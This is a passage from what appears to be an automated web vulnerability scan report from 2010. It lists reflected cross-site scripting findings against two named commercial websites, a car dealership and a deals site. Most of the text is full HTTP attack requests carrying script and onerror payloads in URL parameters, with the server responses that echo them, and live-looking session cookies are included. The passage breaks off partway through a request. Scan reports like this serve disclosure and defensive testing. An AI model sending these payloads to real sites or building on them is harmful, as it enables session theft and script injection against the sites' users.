GET /inventory.php?VehicleType=New5f0c1<script>alert(1)</script>e9ac330026e&Model=Avalon HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response (redirected)
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 04:12:27 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 36915
<!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>New5f0c1<script>alert(1)</script>e9ac330026e Avalon Inventory Search - Fremont Toyota - Toyota ...[SNIP]... </script>e9ac330026e">New5f0c1<script>alert(1)</script>e9ac330026e</option> ...[SNIP]...
The value of the VehicleType request parameter is copied into the HTML document as text between TITLE tags. The payload c87f9</title><script>alert(1)</script>11529c905b3 was submitted in the VehicleType parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /inventory.php?VehicleType=Newc87f9</title><script>alert(1)</script>11529c905b3&Model=Avalon HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response (redirected)
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 04:15:21 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 37084
<!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Newc87f9</title><script>alert(1)</script>11529c905b3 Avalon Inventory Search - Fremont Toyota - Toyota - Serving Oakland - Serving San Jose - Serving Stockton - Serving Watsonville - Fremont California</title> ...[SNIP]...
The value of the VehicleType request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d11d"><script>alert(1)</script>c4314ee6845 was submitted in the VehicleType parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /inventory.php?VehicleType=New5d11d"><script>alert(1)</script>c4314ee6845&Model=Avalon HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response (redirected)
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:59:20 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 36984
<!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>New5d11d"><script>alert(1)</script>c4314ee6845 Avalon Inventory Search - Fremont Toyota - Toyo ...[SNIP]... <meta name="description" content="Search our online inventory for New5d11d"><script>alert(1)</script>c4314ee6845 Avalon at Fremont Toyota in Fremont, California! Call us today at (510) 252-5100, or visit us at 5851 Cushing Pkwy., Fremont, California 94538."> ...[SNIP]...
4.243. http://www.fremonttoyota.com/inventory.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.fremonttoyota.com
Path: /inventory.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7dc73<script>alert(1)</script>6f853fa5542 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /inventory.php?VehicleType=New&Model=Av/7dc73<script>alert(1)</script>6f853fa5542alon HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response (redirected)
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 05:57:55 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 38100
4.244. http://www.fremonttoyota.com/inventory.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.fremonttoyota.com
Path: /inventory.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as text between TITLE tags. The payload dd0f1</title><script>alert(1)</script>bcf7d816ea4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /inventory.php?VehicleType=New&Model=Av/dd0f1</title><script>alert(1)</script>bcf7d816ea4alon HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response (redirected)
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 05:59:08 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 38277
<!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>New Av/dd0f1</title><script>alert(1)</script>bcf7d816ea4alon Inventory Search - Fremont Toyota - Toyota - Serving Oakland - Serving San Jose - Serving Stockton - Serving Watsonville - Fremont California</title> ...[SNIP]...
4.245. http://www.fremonttoyota.com/inventory.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.fremonttoyota.com
Path: /inventory.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b4e9"><script>alert(1)</script>7970917bb6f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /inventory.php?VehicleType=New&Model=Av/6b4e9"><script>alert(1)</script>7970917bb6falon HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response (redirected)
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 05:51:59 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 38171
<!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>New Av/6b4e9"><script>alert(1)</script>7970917bb6falon Inventory Search - Fremont Toyota - Toy ...[SNIP]... <meta name="description" content="Search our online inventory for New Av/6b4e9"><script>alert(1)</script>7970917bb6falon at Fremont Toyota in Fremont, California! Call us today at (510) 252-5100, or visit us at 5851 Cushing Pkwy., Fremont, California 94538."> ...[SNIP]...
The value of the model request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 578a7"><script>alert(1)</script>8773b9b6b60 was submitted in the model parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /quick-quote.html?model=Avalon578a7"><script>alert(1)</script>8773b9b6b60 HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 04:12:18 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 04:12:19 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 14884
<!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Quick Quote - Fremont Toyota - Toyota - Serving Oakland - Serving San Jose - Serving Stockton - ...[SNIP]... <input id="model" type="text" name="model" value="Avalon578a7"><script>alert(1)</script>8773b9b6b60" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9017"><script>alert(1)</script>d8d5c2668c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search/CPO+te9017"><script>alert(1)</script>d8d5c2668c4 HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 05:49:33 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 92925
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cdb32"><script>alert(1)</script>d4195370fae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search/New+2011+Toyota+Avalon+tymMcdb32"><script>alert(1)</script>d4195370fae HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 05:46:38 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 64264
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbcf8"><script>alert(1)</script>3b4cd676d5f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search/New+2011+Toyota+Sienna+tymMcbcf8"><script>alert(1)</script>3b4cd676d5f HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 05:50:21 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 82785
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88857"><script>alert(1)</script>eca77acbb6b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search/New+Toyota+tm88857"><script>alert(1)</script>eca77acbb6b HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 05:51:22 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 83473
<!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>New Toyota Inventory Search - Fremont Toyota - Toyota - Serving Oakland - Serving San Jose - S ...[SNIP]... <a class="mm4-button mm4-button-plain mm4-button-pagination mm4-button-pagination-first" href="/search/New+Toyota+tm88857"><script>alert(1)</script>eca77acbb6b?page=1" title="First Page" > ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d30d"><script>alert(1)</script>2c5ff91a0a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search/Used+Toyota+tm6d30d"><script>alert(1)</script>2c5ff91a0a3 HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 05:47:38 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 92176
<!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Used Toyota Inventory Search - Fremont Toyota - Toyota - Serving Oakland - Serving San Jose - ...[SNIP]... <a class="mm4-button mm4-button-plain mm4-button-pagination mm4-button-pagination-first" href="/search/Used+Toyota+tm6d30d"><script>alert(1)</script>2c5ff91a0a3?page=1" title="First Page" > ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f86fc"><script>alert(1)</script>5832daa7887 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search/Used+tf86fc"><script>alert(1)</script>5832daa7887 HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 05:49:23 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 91252
<!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Used Inventory Search - Fremont Toyota - Toyota - Serving Oakland - Serving San Jose - Serving ...[SNIP]... <a class="mm4-button mm4-button-plain mm4-button-pagination mm4-button-pagination-first" href="/search/Used+tf86fc"><script>alert(1)</script>5832daa7887?page=1" title="First Page" > ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bb30a<img%20src%3da%20onerror%3dalert(1)>f3a4e14984 was submitted in the REST URL parameter 1. This input was echoed as bb30a<img src=a onerror=alert(1)>f3a4e14984 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /contactbb30a<img%20src%3da%20onerror%3dalert(1)>f3a4e14984 HTTP/1.1 Host: www.gotdailydeals.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=EDEB5B7C5BC6F41E7947F6C8D04D0F33.webserver4; __unam=3e3577f-12cc309077b-2ca9e758-1; division=4cd325748cb61d7889ee5617; __utmz=158454956.1291762338.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=158454956.578824552.1291762338.1291762338.1291762338.1; __utmc=158454956; __utmb=158454956.1.10.1291762338; visitor=4cfebadb79f41d7858c136a3;
Response
HTTP/1.1 200 OK Server: nginx/0.7.66 Date: Wed, 08 Dec 2010 05:52:49 GMT Content-Type: text/html;charset=utf-8 Connection: close Set-Cookie: JSESSIONID=3905F56D6FE0512FA942277F966A9ADC.webserver4; Path=/ Set-Cookie: division=4cd325748cb61d7889ee5617; Expires=Thu, 08-Dec-2011 05:56:01 GMT; Path=/ Content-Length: 66
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4ef19<img%20src%3da%20onerror%3dalert(1)>10c36fd08c4 was submitted in the REST URL parameter 1. This input was echoed as 4ef19<img src=a onerror=alert(1)>10c36fd08c4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /eb4ef19<img%20src%3da%20onerror%3dalert(1)>10c36fd08c4 HTTP/1.1 Host: www.gotdailydeals.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=EDEB5B7C5BC6F41E7947F6C8D04D0F33.webserver4; __unam=3e3577f-12cc309077b-2ca9e758-1; division=4cd325748cb61d7889ee5617; __utmz=158454956.1291762338.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=158454956.578824552.1291762338.1291762338.1291762338.1; __utmc=158454956; __utmb=158454956.1.10.1291762338; visitor=4cfebadb79f41d7858c136a3;
Response
HTTP/1.1 200 OK Server: nginx/0.7.66 Date: Wed, 08 Dec 2010 05:51:27 GMT Content-Type: text/html;charset=utf-8 Connection: close Set-Cookie: JSESSIONID=B0C2AC088E202D464E506CDABF5916E0.webserver4; Path=/ Set-Cookie: division=4cd325748cb61d7889ee5617; Expires=Thu, 08-Dec-2011 05:54:39 GMT; Path=/ Content-Length: 62
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2b2d4<img%20src%3da%20onerror%3dalert(1)>be3db197f1a was submitted in the REST URL parameter 1. This input was echoed as 2b2d4<img src=a onerror=alert(1)>be3db197f1a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /facebook-login2b2d4<img%20src%3da%20onerror%3dalert(1)>be3db197f1a HTTP/1.1 Host: www.gotdailydeals.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=EDEB5B7C5BC6F41E7947F6C8D04D0F33.webserver4; __unam=3e3577f-12cc309077b-2ca9e758-1; division=4cd325748cb61d7889ee5617; __utmz=158454956.1291762338.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=158454956.578824552.1291762338.1291762338.1291762338.1; __utmc=158454956; __utmb=158454956.1.10.1291762338; visitor=4cfebadb79f41d7858c136a3;
Response
HTTP/1.1 200 OK Server: nginx/0.7.66 Date: Wed, 08 Dec 2010 05:55:01 GMT Content-Type: text/html;charset=utf-8 Connection: close Set-Cookie: JSESSIONID=92050D0601E1BC668FDB4EC1ABDAA86B.webserver4; Path=/ Set-Cookie: division=4cd325748cb61d7889ee5617; Expires=Thu, 08-Dec-2011 05:58:13 GMT; Path=/ Content-Length: 74
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 772ac<img%20src%3da%20onerror%3dalert(1)>b29251ff8a1 was submitted in the REST URL parameter 1. This input was echoed as 772ac<img src=a onerror=alert(1)>b29251ff8a1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /forgot-password772ac<img%20src%3da%20onerror%3dalert(1)>b29251ff8a1 HTTP/1.1
Host: www.gotdailydeals.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=EDEB5B7C5BC6F41E7947F6C8D04D0F33.webserver4; __unam=3e3577f-12cc309077b-2ca9e758-1; division=4cd325748cb61d7889ee5617; __utmz=158454956.1291762338.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=158454956.578824552.1291762338.1291762338.1291762338.1; __utmc=158454956; __utmb=158454956.1.10.1291762338; visitor=4cfebadb79f41d7858c136a3;
Response
HTTP/1.1 200 OK
Server: nginx/0.7.66
Date: Wed, 08 Dec 2010 05:54:35 GMT
Content-Type: text/html;charset=utf-8
Connection: close
Set-Cookie: JSESSIONID=DFBA9BDA2F6D2A28627EC25EC9CA2161.webserver4; Path=/
Set-Cookie: division=4cd325748cb61d7889ee5617; Expires=Thu, 08-Dec-2011 05:57:47 GMT; Path=/
Content-Length: 75
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4744f<img%20src%3da%20onerror%3dalert(1)>fc8836a3a60 was submitted in the REST URL parameter 1. This input was echoed as 4744f<img src=a onerror=alert(1)>fc8836a3a60 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /j_spring_security_check4744f<img%20src%3da%20onerror%3dalert(1)>fc8836a3a60 HTTP/1.1
Host: www.gotdailydeals.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
